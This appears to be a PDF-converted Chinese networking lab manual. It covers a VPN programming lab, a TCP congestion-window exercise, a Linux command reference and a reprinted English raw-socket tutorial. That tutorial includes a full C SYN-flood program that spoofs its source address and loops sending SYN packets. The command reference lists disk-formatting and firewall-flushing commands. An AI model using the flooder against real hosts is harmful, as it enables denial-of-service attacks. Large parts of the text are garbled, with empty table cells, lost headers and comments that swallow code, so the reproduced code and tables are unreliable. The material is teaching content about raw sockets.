char* error_info, DEVICE_INFO_ITEM* device_item_table,int device_table_size, ROUTE_TABLE_ITEM* route_item_table, int route_table_size,
ARP_TABLE_ITEM* arp_table,int arp_table_size);
函数的作用由函数名标识。源代码详见 vpn_all.c
3 测试验证
首先需要编译程序,在VPNServer1 和VPNServer2 编译并运行程序。
VPNServer1#gcc vpn_all.c –o vpn_all VPNServer1#./vpn_all
在 VPNServer2 的操作同VPNServer1
然后从 PC 1 上进行操作
PC 1# ping 10.0.1.2 (10.0.1.2 是 PC 2 的 IP)
会看到如下回应
/Image_040.jpg)
图 4
为了确保不是系统自己的路由功能,将 VPNServer1 或者VPNServer2 上的任何一个
VPN 程序终止,就会发现
/Image_041.jpg)
图 5
注:前部分收到的包是因为当时没有终止。
在实验过程中如果不能达到联通效果, 请确保针对 VPNServer1 , Network,
VPNServer2 的iptables 服务被关闭或者重新配置符合该实验。
VPN 的一个经典实现是 PPTP,PPTP 的全称是点对点隧道协议,是一种支持多协议虚拟专用网络的网络技术,它工作在第二层。PPTP 是将 PPP 帧封装在 IP 数据包中,通过 IP 网络如 Internet 或者企业专用 Intranet 等发送的。而本程序的实现,是通过将一个以太帧的前 14 位(对应于 MAC 的目的地址和源地址)进行重新修改,然后将修改过的以太帧作为一个整体封装在一个 IP 数据包内在网络上传输。修改以太帧的前 14 位的目的是标识其为一个 VPN 包数据。整体来说,实现的整体思路是差不多的,不同的是封装在 IP 数据包内的数据内容不是完全相同。
实验者需要理解 VPN 的传输原理,并根据样例程序选择重新实现基于第二层或者第三层的 VPN 程序,在标准的 VPN 网络中,除了 VPN 的接入点外,还有一个 VPN 中心服务器,用来存放 VPN 的路由,拓扑信息,实验者需根据个人情况进行设计添加。另外,作为一个递进式的网络实验,实验者需要将之前的路由程序应用于自己构建的程序测试拓扑网络之中。
实验报告
由于本次实验着重程序的设计,试验报告中将不要求统一的配置性细节,大家可以根据上面的环境进行模拟或者自行设置实验环境。
实验者需提交源代码以及实验报告。提交文件布局如下:
/Image_042.jpg)
其中 source.c 为 C 的源文件,configuration.file 为相关配置文件。建议同学可以在
source.c 中的重要代码或者函数入口处添加注释,不做定性要求。
实验报告最好提交成 doc 或者 docx 格式的 word 文档,格式如下,同学可以根据内容进行修改,但是各个项目不可省略。说明是为了更详细的解释各个项目,提交的试验
包中无需包含。
|
实验目的 | |
|
数据结构说明 |
说明:此处需要解释各自的源代码中的数据结构,以及其用途。示例: floag weight; int age; }; 该结构是一个描述 xiaomaolv 的结构,对应于现实生活农场中养的毛驴,其中 id 是其在农场中的编号,weight,age 分别代表了该毛驴的质量和年龄。 |
|
配置文件说明(非必须) |
说明:此处需要给出配置文件的格式以及读取方式,如程序中没有用到配置文件,则该项可省略 |
|
程序设计的思路以及运行流程 |
说明:此处需要给出程序的运行流程或者思路。请给出如下两种格式之一:
|
|
运行结果截图 |
说明:请给出你的运行结果截图 |
|
相关参考资料 |
说明:请给出你完成该实验的参考书目或者网页 |
|
对比样例程序 |
说明:请给出你参考样例程序的部分,假如没有参考点,填无 |
|
代码个人创新以及 思考 |
说明:请给出你认为你的源代码中的亮点,比如,针对某个细 节的处理或者算法的优化 |
|
该程序的应用场景 创新(非必须) |
说明:请思考一下,该类程序除了在背景中的应用之外,是否 还有其他可能的应用场景。 |
实验七 TCP 协议的拥塞控制机制观察
实验任务
仔细阅读课本中关于 TCP 拥塞控制的介绍以及拥塞控制算法的状态自动机,完成以下任务。
- 利用 Wireshark 记录若干 TCP 短流(少于 5 秒,如访问 web 页面,收发邮件等)和TCP
长流(长于 1 分钟,如 FTP 下载大文件,用HTTP 观看在线视频等)。
-
对于每个TCP 流,画出其congestion window 随时间的变化曲线,并指出拥塞控制的慢启动、拥塞避免、快恢复等阶段。
-
画出每个TCP 流的瞬时吞吐量,并统计其平均吞吐量和丢包率。
提交材料:实验报告
附录 1. Linux 命令列表附录 2. raw_socket
Linux 命令列表
目录
Microsoft windows 网 络 (samba) 75
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
(2) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
(1) |
| |
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:21pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark44">文件搜索</a>
命令
说明
# find / -name file1
从<span class="s52">'/' </span>开始进入根文件系统搜索文件和目录
# find / -user user1
搜索属于用户<span class="s52">'user1' </span>的文件和目录
# find /home/user1 -name \*.bin
在目录<span class="s52">'/ home/user1' </span>中搜索带有<span class="s52">'.bin' </span>结尾的文件
# find /usr/bin -type f -atime +100
搜索在过去 <span class="s52">100 </span>天内未被使用过的执行文件
# find /usr/bin -type f -mtime -10
搜索在 <span class="s52">10 </span>天内被创建或者修改过的文件
# find / -name *.rpm -exec chmod 755 '{}'
;
搜索以<span class="s52">'.rpm' </span>结尾的文件并定义其权限
# find / -xdev -name \*.rpm
搜索以<span class="s52">'.rpm' </span>结尾的文件,忽略光驱、捷盘等可移动设备
# locate \*.ps
寻找以<span class="s52">'.ps' </span>结尾的文件 <span class="s52">- </span>先运行 <span class="s52">'updatedb'</span>
命令
# whereis halt
显示一个二进制文件、源码或<span class="s52">man </span>的位置
# which halt
显示一个二进制文件或可执行文件的完整路径
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
| |
|
|
|
|
|
mnt/hda2' 已经存在 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
//WinClient/share /mnt/share |
|
|
mnt/hda2' 退出 |
|
|
| |
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:21pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark46">磁盘空间</a>
命令
说明
# df -h
显示已经挂载的分区列表
# dpkg-query -W -f='${Installed- Size;10}t${Package}n' | sort -k1,1n
以大小为依据显示已安装的 <span class="s52">deb </span>包所使用的空间<span class="s52">(ubuntu, debian </span>类系统<span class="s52">)</span>
# du -sh dir1
估算目录<span class="s52">'dir1' </span>已经使用的磁盘空间<span class="s52">'</span>
# du -sk * | sort -rn
以容量大小为依据依次显示文件和目录的大小
# ls -lSr |more
以尺寸大小排列文件和目录
# rpm -q -a --qf '%10{SIZE}t%{NAME}n' | sort -k1,1n
以大小为依据依次显示已安装的 <span class="s52">rpm </span>包所使用的空间<span class="s52">(fedora, redhat </span>类系统<span class="s52">)</span>
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:21pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark47">用户和群组</a>
命令
说明
# chage -E 2005-12-31 user1
设置用户口令的失效期限
# groupadd [group]
创建一个新用户组
# groupdel [group]
删除一个用户组
# groupmod -n moon sun
重命名一个用户组
# grpck
检查 <span class="s52">'/etc/passwd' </span>的文件格式和语法修正以及存在的群组
# newgrp - [group]
登陆进一个新的群组以改变新创建文件的预设群组
# passwd
修改口令
# passwd user1
修改一个用户的口令<span class="s52">(</span>只允许 <span class="s52">root </span>执行<span class="s52">)</span>
# pwck
检查 <span class="s52">'/etc/passwd' </span>的文件格式和语法修正以及存在的用户
# useradd -c "User Linux" -g admin -d
/home/user1 -s /bin/bash user1
创建一个属于<span class="s52">"admin" </span>用户组的用户
# useradd user1
创建一个新用户
# userdel -r user1
删除一个用户<span class="s52">( '-r' </span>排除主目录<span class="s52">)</span>
# usermod -c "User FTP" -g system -d
/ftp/user1 -s /bin/nologin user1
修改用户属性
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
| |
|
|
|
|
|
(o)以读(r )、写(w)和执行(x)的权限 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
"string2" |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:21pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark53">字符设置和文件格式</a>
命令
说明
# dos2unix filedos.txt fileunix.txt
将一个文本文件的格式从 <span class="s52">MSDOS </span>转换成
UNIX
# recode ..HTML < page.txt > page.html
将一个文本文件转换成 <span class="s52">html</span>
# recode -l | more
显示所有允许的转换格式
# unix2dos fileunix.txt filedos.txt
将一个文本文件的格式从 <span class="s52">UNIX </span>转换成
MSDOS
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:21pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark54">初始化一个文件系统</a>
命令
说明
# fdformat -n /dev/fd0
格式化一个软盘
# mke2fs /dev/hda1
在 <span class="s52">hda1 </span>分区创建一个 <span class="s52">linux ext2 </span>的文件系统
# mke2fs -j /dev/hda1
在 <span class="s52">hda1 </span>分区创建一个 <span class="s52">linux ext3(</span>日志型<span class="s52">)</span>的文件系统
# mkfs /dev/hda1
在 <span class="s52">hda1 </span>分区创建一个文件系统
# mkfs -t vfat 32 -F /dev/hda1
创建一个<span class="s52">FAT32 </span>文件系统
# mkswap /dev/hda3
创建一个<span class="s52">swap </span>文件系统
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:21pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark55">SWAP </a><span class="s50">文件系统</span>
命令
说明
# mkswap /dev/hda3
创建一个<span class="s52">swap </span>文件系统
# swapon /dev/hda3
启用一个新的 <span class="s52">swap </span>文件系统
# swapon /dev/hda2 /dev/hdb3
启用两个<span class="s52">swap </span>分区
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
| |
|
|
|
bzip 包 |
-parents |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-p' |
|
/home/backup-home && tar x -p' |
|
|
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
(sniffing) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
PID |
|
|
|
|
|
|
|
|
|
|
|
|
/proc/sys/net/ipv4/ip_forward |
|
|
|
|
|
| |
| |
|
|
//WinClient/share /mnt/share |
|
|
|
|
|
|
|
|
主机上下载文件 |
| |
<table style="border-collapse:collapse;margin-left:10.885pt" cellspacing="0"><tr style="height:19pt"><td style="width:405pt;border-top-style:solid;border-top-width:1pt;border-top-color:#A1A1A1;border-left-style:solid;border-left-width:1pt;border-left-color:#F0F0F0;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#A1A1A1;border-right-style:solid;border-right-width:1pt;border-right-color:#A1A1A1" colspan="2">
<a name="bookmark59">IPTABLES (firewall)</a>
命令
说明
# iptables -t filter -L
显示过滤表的所有链路
# iptables -t nat -L
显示 <span class="s52">nat </span>表的所有链路
# iptables -t filter -F
以过滤表为依据清理所有规则
# iptables -t nat -F
以 <span class="s52">nat </span>表为依据清理所有规则
# iptables -t filter -X
删除所有由用户创建的链路
# iptables -t filter -A INPUT -p tcp --dport telnet -j ACCEPT
允许 <span class="s52">telnet </span>接入
# iptables -t filter -A OUTPUT -p tcp -- dport http -j DROP
阻止<span class="s52">HTTP </span>连出
# iptables -t filter -A FORWARD -p tcp -- dport pop3 -j ACCEPT
允许转发链路上的<span class="s52">POP3 </span>连接
# iptables -t filter -A INPUT -j LOG --log- prefix
记录所有链路中被查封的包
# iptables -t nat -A POSTROUTING -o eth0
-j MASQUERADE
设置一个<span class="s52">PAT (</span>端口地址转换<span class="s52">) </span>在<span class="s52">eth0 </span>掩盖发出包
# iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp --dport 22 -j DNAT --to-destination 10.0.0.2:22
将发往一个主机地址的包转向到其他主机
[Linux Command Line written by ](http://www.linuxguide.it/commands)[LinuxGuide.it](http://www.linuxguide.it/commands)<span style=" color: #00F; font-family:Calibri, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 11pt;"> </span>(<span class="s55">Credits</span>)
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
| |
|
|
|
|
|
你仅知晓程序是干什么,而又记不得命令时特别有用 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
[A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html](http://mixter.void.ru/rawip.html)
A brief programming tutorial in C for raw sockets
by Mixter for the BlackC ode Magazine http://mixter.void.ru or http://mixter.warrior2k.com
1. Raw sockets
2. The protocols IP, IC<span class="s63"> </span>MP, TC<span class="s63"> </span>P and UDP
3. Building and injecting datagrams
4. Basic transport layer operations
In this tutorial, you'll learn the basics of using raw sockets in C , to insert any IP protocol based datagram into the network traffic. This is useful,for example, to build raw socket scanners like nmap, to spoof or to perform operations that need to send out raw sockets. Basically, you can send any packet at any time, whereas using the interface functions for your systems IP-stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection). For this tutorial, all you need is a minimal knowledge of socket programming in C (see )http://www.ecst.csuchico.edu/~beej/guide/net/)).)
- Raw sockets
The basic concept of low level sockets is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOC K_PAC KET, which receives and sends data on the device link layer. This means, the NIC specific header is included in the data that will be written or read. For most networks, this is the ethernet header. Of course, all subsequent protocol headers will also be included in the data. The socket type we'll be using, however, is SOC K_RAW, which includes the IP headers and all subsequent protocol headers and data.
The (simplified) link layer model looks like this:
Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) -> Transport layer (TC P, UDP, IC MP) -> Session layer (application specific data)
Now to some practical stuff. A standard command to create a datagram socket is: socket (PF_INET, SOC K_RAW, IPPROTO_UDP); From the moment that it is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TC P, UDP and IC MP traffic, you have to create 3 separate raw sockets, using IPPROTO_TC P, IPPROTO_UDP and IPPROTO_IC MP (the protocol numbers are 0 or 6 for tcp, 17 for udp and 1 for icmp).
With this knowledge, we can, for example, already create a small sniffer, that dumps out the contents of all tcp packets we receive. (Headers, etc. are missing, this is just an example. As you see, we are skipping the IP and TC P headers which are contained in the packet, and print out the payload, the data of the session/application layer, only).
int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */ while (read (fd, buffer, 8192) > 0)
printf ("Caught tcp packet: %s\n", buffer+sizeof(struct iphdr)+sizeof(struct tcphdr));
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
- The protocols IP, ICMP, TCP and UDP
To inject your own packets, all you need to know is the structures of the protocols that need to be included. Below you will find a short introduction to the IP, IC MP, TC P and UDP headers. It is recommended to build your packet by using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the header files (eg. ). You can always create your own structs, as long as the length of each option is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use the little endian notation. On big endian machines (some other processor architectures than intel x86), the 4
bit-size variables exchange places. However, one can always use the structures in the same ways in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and which meaning they have.
The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits)
struct ipheader {
unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */ unsigned char ip_tos;
unsigned short int ip_len; unsigned short int ip_id; unsigned short int ip_off; unsigned char ip_ttl; unsigned char ip_p; unsigned short int ip_sum; unsigned int ip_src; unsigned int ip_dst;
}; /* total ip header length: 20 bytes (=160 bits) */
The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp.
ip_hl: the ip header length in 32bit octets. this means a value of 5 for the hl means 20 bytes (5
* 4). values other than 5 only need to be set it the ip header contains options (mostly used for routing)
ip_v : the ip version is always 4 (maybe I'll write a IPv6 tutorial later;)
ip_tos: type of service controls the priority of the packet. 0x00 is normal. the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost).
ip_len: total length must contain the total length of the ip datagram. this includes ip header, icmp or tcp or udp header and payload size in bytes.
ip_id: the id sequence number is mainly used for reassembly of fragmented IP datagrams. when sending single datagrams, each can have an arbitrary ID.
ip_off: the fragment offset is used for reassembly of fragmented datagrams. the first 3 bits are the fragment flags, the first one always 0, the second the do-not-fragment bit (set by ip_off
|= 0x4000) and the third the more-flag or more-fragments-following bit (ip_off |= 0x2000). the following 13 bits is the fragment offset, containing the number of 8-byte big packets already sent.
ip_ttl: time to live is the amount of hops (routers to pass) before the packet is discarded, and an icmp error message is returned. the maximum is 255.
ip_p: the transport layer protocol. can be tcp (6), udp(17), icmp(1), or whatever protocol follows the ip header. look in /etc/protocols for more.
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
ip_sum: the datagram checksum for the whole ip datagram. every time anything in the datagram changes, it needs to be recalculated, or the packet will be discarded by the next router. see V. for a checksum function.
ip_src and ip_dst: source and destination IP address, converted to long format, e.g. by inet_addr(). both can be chosen arbitrarily.
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet C ontrol Messaging Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered as a protocol of the network layer.
struct icmpheader { unsigned char icmp_type; unsigned char icmp_code;
unsigned short int icmp_cksum;
/* The following data structures are ICMP type specific */ unsigned short int icmp_id;
unsigned short int icmp_seq;
}; /* total icmp header length: 8 bytes (=64 bits) */
icmp_type : the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. look in for all the types.
icmp_code : this is significant when sending an error message (unreach), and specifies the kind of error. again, consult the include file for more.
icmp_cksum: the checksum for the icmp header + data. same as the IP checksum. Note: The next 32 bits in an icmp packet can be used in many different ways. This depends on the icmp type and code. the most commonly seen structure, an ID and sequence number, is used in echo requests and replies, hence we only use this one, but keep in mind that the header is actually more complex.
icmp_id: used in echo request/reply messages, to identify the request
icmp_seq: identifies the sequence of echo messages, if more than one is sent.
The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TC P provide 65535 different source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TC P, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and might not be reliable (e.g. they can be lost unnoticed), since they are not acknowledged using replies and sequence numbers.
struct udpheader {
unsigned short int uh_sport; unsigned short int uh_dport; unsigned short int uh_len; unsigned short int uh_check;
}; /* total udp header length: 8 bytes (=64 bits) */
uh_sport: The source port that a client bind()s to, and the contacted server will reply back to in order to direct his responses to the client.
uh_dport: The destination port that a specific server can be contacted on. uh_len: The length of udp header and payload data in bytes.
uh_check: The checksum of header and data, see IP checksum.
The Transmission C ontrol Protocol is the mostly used transport protocol that provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.)
struct tcpheader {
unsigned short int th_sport; unsigned short int th_dport; unsigned int th_seq;
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
unsigned int th_ack;
unsigned char th_x2:4, th_off:4; unsigned char th_flags;
unsigned short int th_win; unsigned short int th_sum; unsigned short int th_urp;
}; /* total tcp header length: 20 bytes (=160 bits) */
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
th_sport: The source port, which has the same function as in UDP. th_dport: The destination port, which has the same function as in UDP.
th_seq: The sequence number is used to enumerate the TC P segments. The data in a TC P connection can be contained in any amount of segments (=single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence is random.
th_ack: Every packet that is sent and a valid part of a connection is acknowledged with an empty TC P segment with the AC K flag set (see below), and the th_ack field containing the previous the_seq number.
th_x2: This is unused and contains binary zeroes.
th_off: The segment offset specifies the length of the TC P header in 32bit/4byte blocks. Without tcp header options, the value is 5.
th_flags: This field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3...
TH_URG: Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using telnet protocol).
TH_AC K: Acknowledgement. Used to acknowledge data and in the second and third stage of a TC P connection initiation (see IV.).
TH_PSH: Push. The systems IP stack will not buffer the segment and forward it to the application immediately (mostly used with telnet).
TH_RST: Reset. Tells the peer that the connection has been terminated.
TH_SYN: Synchronization. A segment with the SYN flag set indicates that client wants to initiate a new connection to the destination port.
TH_FIN: Final. The connection should be closed, the peer is supposed to answer with one last segment with the FIN flag set as well.
th_win: Window. The amount of bytes that can be sent before the data should be acknowledged with an AC K before sending more segments.
th_sum: The checksum of pseudo header, tcp header and payload. The pseudo is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment. th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority.
- Building and injecting datagrams
Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s). We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (Syn flooder).
#define __USE_BSD /* use bsd'ish ip header */
#include /* these headers are for a Linux system, but / #include / the names on other systems are easy to guess.. */ #include
#define #include #include
__FAVOR_BSD /* use bsd'ish tcp header */
#define P 25 /* lets flood the sendmail port */
unsigned short /* this function generates header checksums */ csum (unsigned short *buf, int nwords)
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--) sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16);
return ~sum;
}
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
int
main (void)
{
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket / char datagram[4096]; / this buffer will contain ip header, tcp header,
and payload. we'll point an ip header structure
at its beginning, and a tcp header structure after that to write the header values into it */
struct ip *iph = (struct ip *) datagram;
struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip); struct sockaddr_in sin;
/* the sockaddr_in containing the dest. address is used in sendto() to determine the datagrams path */
sin.sin_family = AF_INET;
sin.sin_port = htons (P);/* you byte-order >1byte header values to network
byte order (not needed on big endian machines) */ sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
memset (datagram, 0, 4096); /* zero out the buffer */
/* we'll now fill in the ip/tcp header values, see above for explanations */ iph->ip_hl = 5;
iph->ip_v = 4;
iph->ip_tos = 0;
iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload * iph->ip_id = htonl (54321); /* the value doesn't matter here */
iph->ip_off = 0;
iph->ip_ttl = 255;
iph->ip_p = 6;
iph->ip_sum = 0; /* set it to 0 before computing the actual chec iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */ iph->ip_dst.s_addr = sin.sin_addr.s_addr;
tcph->th_sport = htons (1234); /* arbitrary port */ tcph->th_dport = htons (P);
tcph->th_seq = random ();/* in a SYN packet, the sequence is a random / tcph->th_ack = 0;/ number, and the ack sequence is 0 in the 1st packet */ tcph->th_x2 = 0;
tcph->th_off = 0; /* first and only tcp segment / tcph->th_flags = TH_SYN; / initial connection request / tcph->th_win = htonl (65535); / maximum allowed window size */
tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack should fill in the correct checksum during transmission *
tcph->th_urp = 0;
iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
/* finally, it is very advisable to do a IP_HDRINCL call, to make sure that the kernel knows the header is included in the data, and doesn't insert its own header into the packet before our data */
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
{ /* lets do it the ugly way.. */ int one = 1;
const int *val = &one;
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0) printf ("Warning: Cannot set HDRINCL!\n");
}
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
while (1)
{
if (sendto (s, /* our socket */
datagram, /* the buffer containing headers and data / iph->ip_len, / total length of our datagram */
0, /* routing flags, normally always 0 */
(struct sockaddr ) &sin, / socket addr, just like in / sizeof (sin)) < 0) / a normal send() */
printf ("error\n"); else
printf (".");
}
return 0;
}
- Basic transport layer operations
To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction into the most important operations in the IP stack. To learn more about the behavior of the protocols, one option is to exame the source for your systems IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/. The most important protocol, of course, is TC P, on which I will focus on.
C onnection initiation: to contact an udp or tcp server listening on port 1234, the client calls a connect() with the sockaddr structure containing destination address and port. If the client did not bind() to a source port, the systems IP stack will select one it'll bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dest: servers address, TC P/UDP src: clients source port, TC P/UDP dest: port 1234. If a client is located on port 1234 on the destination host, it will reply back with a datagram containing: IP src: server IP dst: client srcport: server port dstport: clients source port. If there is no server located on the host, an IC MP type unreach message is created, subcode "C onnection refused". The client will then terminate. If the destination host is down, either a router will create a different IC MP unreach message, or the client gets no reply and the connection times out.
